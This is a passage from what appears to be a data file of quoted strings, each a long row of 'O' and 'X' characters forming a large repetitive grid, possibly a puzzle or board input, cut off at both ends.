OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXO","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","OXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXO","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","OXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXO","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","OXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXO","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","OXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXO","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","OXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXO","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","OXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXO","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","OXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXO","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","OXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXO","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","OXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXO","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","OXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXO","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","OXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXO","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","OXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXO","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","OXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXO","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","OXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXO","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO","OXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX","OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO